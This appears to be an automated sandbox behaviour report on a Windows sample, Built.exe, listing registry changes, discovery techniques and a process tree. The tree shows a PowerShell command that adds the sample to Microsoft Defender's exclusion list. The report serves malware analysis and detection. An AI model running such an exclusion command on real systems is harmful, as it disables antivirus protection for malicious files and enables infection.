Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
828	cmd.exe
3580	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3536	netsh.exe
2952	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3148	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3776	systeminfo.exe

Modifies data under HKEY_USERS 57 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2F	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\30	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3b	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\35	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\35	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\38	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\34	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\41	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\42	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\34	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3C	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3d	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\37	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3f	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\36	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\40	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\29	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\39	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\30	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\31	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\32	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\41	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\39	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3B	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\31	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\33	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\33	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\37	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\36	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3e	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3A	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3F	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\40	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\38	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3c	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6F3FDD16991BBC544938882C4AFBD8A8\DeploymentFlags = "3"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0D6FE611E8EAD6E40B8DFE1F54DC54AD\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0D6FE611E8EAD6E40B8DFE1F54DC54AD\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Dotnet_CLI_8.4.324.47413_x64\Dependents	dotnet-sdk-8.0.403-win-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E97D7325C1339393783BB0359BCD0AA1	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC0E9BFEA8AA42D4F8AD336E392C6288\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\DE1DC260C3A0C3848A17057123045C54\Provider	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5CBE08A386B69B94EBDB1E6A9C664B61\PackageCode = "BB3C7C2D57FDE7E48A50E3073BBF635F"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B068F02E296E4DD4287EF20FE6220213\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\dotnet_apphost_pack_64.40.21578_x64_x86	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.AspNetCore.TargetingPack_x64_en_US.UTF-8,v8.0.10-servicing.24468.4\DisplayName = "Microsoft ASP.NET Core 8.0.10 Targeting Pack (x64)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6F3FDD16991BBC544938882C4AFBD8A8\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\4DD7C1414D507E649A42F5DD754D6733\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.MacCatalyst,8.0.100,17.0.8478,x64\DisplayName = "Microsoft.NET.Sdk.MacCatalyst.Manifest-8.0.100 (x64)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\782729899778A74419E93720D8357F91\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Maui,8.0.100,8.0.3,x64	dotnet-sdk-8.0.403-win-x64.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8E99F865D2F97D840AD56DC415B2A3DF\AuthorizedLUAApp = "0"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1CBD8D3B8681AC04980C00D291E34709\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Android,8.0.100,34.0.43,x64\DisplayName = "Microsoft.NET.Sdk.Android.Manifest-8.0.100 (x64)"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Android,8.0.100,34.0.43,x64\Dependents	dotnet-sdk-8.0.403-win-x64.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\AC4835B8981DEFC4D80FD2504BAE4899\Version = "285221150"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\AC4835B8981DEFC4D80FD2504BAE4899\SourceList\Net	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\776E3A688CE808043995BFECDA30C927\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CC0E9BFEA8AA42D4F8AD336E392C6288\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{c8a2ace2-6555-4192-bf52-f8dfb1eb7678}\Version = "8.4.324.47413"	dotnet-sdk-8.0.403-win-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\2C49ADB902B57545E4B6C1BFE581B3B3\B068F02E296E4DD4287EF20FE6220213	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A44EC839E2ED95B4DB7B5D514AA10A92\SourceList\PackageName = "dotnet-apphost-pack-8.0.10-win-x64_x86.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\netstandard_targeting_pack_24.0.28113_x64	dotnet-sdk-8.0.403-win-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\AC4835B8981DEFC4D80FD2504BAE4899\F_DependencyProvider	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\CC0E9BFEA8AA42D4F8AD336E392C6288	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.NET.Sdk.macOS,8.0.100,14.0.8478,x64	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0D6FE611E8EAD6E40B8DFE1F54DC54AD\ProductName = "Microsoft.NET.Sdk.Maui.Manifest-8.0.100 (x64)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\DE1DC260C3A0C3848A17057123045C54\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BFC6307A304B895458FF3D79BA8B1837\PackageCode = "F8169BBEFE6AC4D42A5C0AE3DB66EDD9"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0479C4164DF388742A77C753BCC423B3\Provider	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3A81E316AA7547E74163848CB60F5FB6	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E7ACC97FC6D734F459F18B0C7CF4788E\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\57E95FB650EB96C4C98453236BEDE05C\ProductName = "Microsoft.NET.Sdk.iOS.Manifest-8.0.100 (x64)"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\630BEA3FA8B452C44B2D5890449E904C	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\630BEA3FA8B452C44B2D5890449E904C\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.AspNetCore.SharedFramework_x64_en_US.UTF-8,v8.0.10-servicing.24468.4	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.AspNetCore.SharedFramework_x64_en_US.UTF-8,v8.0.10-servicing.24468.4\ = "{D7156216-38DA-3370-A1EF-CEA07751D873}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.iOS,8.0.100,17.0.8478,x64\DisplayName = "Microsoft.NET.Sdk.iOS.Manifest-8.0.100 (x64)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0D6FE611E8EAD6E40B8DFE1F54DC54AD\SourceList\PackageName = "24bb901c0e890ef24f6b95928cd093a1-x64.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B068F02E296E4DD4287EF20FE6220213	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\netstandard_targeting_pack_24.0.28113_x64\Dependents\{c8a2ace2-6555-4192-bf52-f8dfb1eb7678}	dotnet-sdk-8.0.403-win-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0479C4164DF388742A77C753BCC423B3\SourceList\PackageName = "windowsdesktop-runtime-8.0.10-win-x64.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Android,8.0.100,34.0.43,x64\ = "{B5A57BF9-FC7A-4FA6-BAEB-46E173986DF3}"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9FB75A5BA7CF6AF4ABBE641E3789D63F	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Android,8.0.100,34.0.43,x64	dotnet-sdk-8.0.403-win-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\dotnet_targeting_pack_64.40.21578_x64\Dependents	dotnet-sdk-8.0.403-win-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6F3FDD16991BBC544938882C4AFBD8A8\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Sdk.Maui,8.0.100,8.0.3,x64\Dependents\{c8a2ace2-6555-4192-bf52-f8dfb1eb7678}	dotnet-sdk-8.0.403-win-x64.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CB6FA83ADA53BCE43B6FA2F5A709084F\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5CBE08A386B69B94EBDB1E6A9C664B61\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0D6FE611E8EAD6E40B8DFE1F54DC54AD\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.NET.Workload.Mono.ToolChain.Current,8.0.100,8.0.10,x64\Version = "64.40.21578"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\776E3A688CE808043995BFECDA30C927\F_RegistryKeys	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E68A770D982022546A5387D31BBDE782\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\dotnet_apphost_pack_64.40.21578_x64	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0479C4164DF388742A77C753BCC423B3\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E68A770D982022546A5387D31BBDE782\SourceList\Net	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\630BEA3FA8B452C44B2D5890449E904C\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\04B49EE5C56110D3CBBA5583C8BB7C7E	msiexec.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3580	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2432	powershell.exe
1540	powershell.exe
1540	powershell.exe
2432	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
5008	powershell.exe
5008	powershell.exe
5008	powershell.exe
5008	powershell.exe
2716	powershell.exe
2716	powershell.exe
5100	powershell.exe
5100	powershell.exe
2716	powershell.exe
5100	powershell.exe
1092	powershell.exe
1092	powershell.exe
1092	powershell.exe
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe
4036	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	4624	WMIC.exe
Token: SeSecurityPrivilege	4624	WMIC.exe
Token: SeTakeOwnershipPrivilege	4624	WMIC.exe
Token: SeLoadDriverPrivilege	4624	WMIC.exe
Token: SeSystemProfilePrivilege	4624	WMIC.exe
Token: SeSystemtimePrivilege	4624	WMIC.exe
Token: SeProfSingleProcessPrivilege	4624	WMIC.exe
Token: SeIncBasePriorityPrivilege	4624	WMIC.exe
Token: SeCreatePagefilePrivilege	4624	WMIC.exe
Token: SeBackupPrivilege	4624	WMIC.exe
Token: SeRestorePrivilege	4624	WMIC.exe
Token: SeShutdownPrivilege	4624	WMIC.exe
Token: SeDebugPrivilege	4624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4624	WMIC.exe
Token: SeRemoteShutdownPrivilege	4624	WMIC.exe
Token: SeUndockPrivilege	4624	WMIC.exe
Token: SeManageVolumePrivilege	4624	WMIC.exe
Token: 33	4624	WMIC.exe
Token: 34	4624	WMIC.exe
Token: 35	4624	WMIC.exe
Token: 36	4624	WMIC.exe
Token: SeDebugPrivilege	4536	tasklist.exe
Token: SeDebugPrivilege	4440	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4624	WMIC.exe
Token: SeSecurityPrivilege	4624	WMIC.exe
Token: SeTakeOwnershipPrivilege	4624	WMIC.exe
Token: SeLoadDriverPrivilege	4624	WMIC.exe
Token: SeSystemProfilePrivilege	4624	WMIC.exe
Token: SeSystemtimePrivilege	4624	WMIC.exe
Token: SeProfSingleProcessPrivilege	4624	WMIC.exe
Token: SeIncBasePriorityPrivilege	4624	WMIC.exe
Token: SeCreatePagefilePrivilege	4624	WMIC.exe
Token: SeBackupPrivilege	4624	WMIC.exe
Token: SeRestorePrivilege	4624	WMIC.exe
Token: SeShutdownPrivilege	4624	WMIC.exe
Token: SeDebugPrivilege	4624	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4624	WMIC.exe
Token: SeRemoteShutdownPrivilege	4624	WMIC.exe
Token: SeUndockPrivilege	4624	WMIC.exe
Token: SeManageVolumePrivilege	4624	WMIC.exe
Token: 33	4624	WMIC.exe
Token: 34	4624	WMIC.exe
Token: 35	4624	WMIC.exe
Token: 36	4624	WMIC.exe
Token: SeDebugPrivilege	3308	tasklist.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	2952	tasklist.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	4920	WMIC.exe
Token: SeSecurityPrivilege	4920	WMIC.exe
Token: SeTakeOwnershipPrivilege	4920	WMIC.exe
Token: SeLoadDriverPrivilege	4920	WMIC.exe
Token: SeSystemProfilePrivilege	4920	WMIC.exe
Token: SeSystemtimePrivilege	4920	WMIC.exe
Token: SeProfSingleProcessPrivilege	4920	WMIC.exe
Token: SeIncBasePriorityPrivilege	4920	WMIC.exe
Token: SeCreatePagefilePrivilege	4920	WMIC.exe
Token: SeBackupPrivilege	4920	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2324	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4872 wrote to memory of 2884	4872	Built.exe	89
PID 4872 wrote to memory of 2884	4872	Built.exe	89
PID 2884 wrote to memory of 2128	2884	Built.exe	92
PID 2884 wrote to memory of 2128	2884	Built.exe	92
PID 2884 wrote to memory of 4072	2884	Built.exe	93
PID 2884 wrote to memory of 4072	2884	Built.exe	93
PID 4072 wrote to memory of 1540	4072	cmd.exe	96
PID 4072 wrote to memory of 1540	4072	cmd.exe	96
PID 2128 wrote to memory of 2432	2128	cmd.exe	97
PID 2128 wrote to memory of 2432	2128	cmd.exe	97
PID 2884 wrote to memory of 4200	2884	Built.exe	100
PID 2884 wrote to memory of 4200	2884	Built.exe	100
PID 2884 wrote to memory of 1932	2884	Built.exe	101
PID 2884 wrote to memory of 1932	2884	Built.exe	101
PID 2884 wrote to memory of 2248	2884	Built.exe	102
PID 2884 wrote to memory of 2248	2884	Built.exe	102
PID 4200 wrote to memory of 4264	4200	cmd.exe	107
PID 4200 wrote to memory of 4264	4200	cmd.exe	107
PID 2248 wrote to memory of 436	2248	cmd.exe	108
PID 2248 wrote to memory of 436	2248	cmd.exe	108
PID 2884 wrote to memory of 4268	2884	Built.exe	109
PID 2884 wrote to memory of 4268	2884	Built.exe	109
PID 4268 wrote to memory of 5008	4268	cmd.exe	112
PID 4268 wrote to memory of 5008	4268	cmd.exe	112
PID 2884 wrote to memory of 4764	2884	Built.exe	113
PID 2884 wrote to memory of 4764	2884	Built.exe	113
PID 2884 wrote to memory of 3672	2884	Built.exe	114
PID 2884 wrote to memory of 3672	2884	Built.exe	114
PID 2884 wrote to memory of 3704	2884	Built.exe	117
PID 2884 wrote to memory of 3704	2884	Built.exe	117
PID 2884 wrote to memory of 4468	2884	Built.exe	118
PID 2884 wrote to memory of 4468	2884	Built.exe	118
PID 2884 wrote to memory of 4812	2884	Built.exe	119
PID 2884 wrote to memory of 4812	2884	Built.exe	119
PID 2884 wrote to memory of 4792	2884	Built.exe	154
PID 2884 wrote to memory of 4792	2884	Built.exe	154
PID 2884 wrote to memory of 2952	2884	Built.exe	165
PID 2884 wrote to memory of 2952	2884	Built.exe	165
PID 2884 wrote to memory of 4604	2884	Built.exe	125
PID 2884 wrote to memory of 4604	2884	Built.exe	125
PID 2884 wrote to memory of 2100	2884	Built.exe	127
PID 2884 wrote to memory of 2100	2884	Built.exe	127
PID 2884 wrote to memory of 1620	2884	Built.exe	129
PID 2884 wrote to memory of 1620	2884	Built.exe	129
PID 3672 wrote to memory of 4536	3672	cmd.exe	133
PID 3672 wrote to memory of 4536	3672	cmd.exe	133
PID 4764 wrote to memory of 4440	4764	cmd.exe	134
PID 4764 wrote to memory of 4440	4764	cmd.exe	134
PID 3704 wrote to memory of 4624	3704	cmd.exe	135
PID 3704 wrote to memory of 4624	3704	cmd.exe	135
PID 2952 wrote to memory of 3536	2952	cmd.exe	137
PID 2952 wrote to memory of 3536	2952	cmd.exe	137
PID 4468 wrote to memory of 2716	4468	cmd.exe	170
PID 4468 wrote to memory of 2716	4468	cmd.exe	170
PID 4792 wrote to memory of 4460	4792	cmd.exe	139
PID 4792 wrote to memory of 4460	4792	cmd.exe	139
PID 1620 wrote to memory of 5100	1620	cmd.exe	140
PID 1620 wrote to memory of 5100	1620	cmd.exe	140
PID 4812 wrote to memory of 3308	4812	cmd.exe	141
PID 4812 wrote to memory of 3308	4812	cmd.exe	141
PID 4604 wrote to memory of 3776	4604	cmd.exe	142
PID 4604 wrote to memory of 3776	4604	cmd.exe	142
PID 2100 wrote to memory of 3200	2100	cmd.exe	143
PID 2100 wrote to memory of 3200	2100	cmd.exe	143

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
436	attrib.exe
4492	attrib.exe
2096	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4872
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2432
- - C:\Windows\system32\cmd.exe
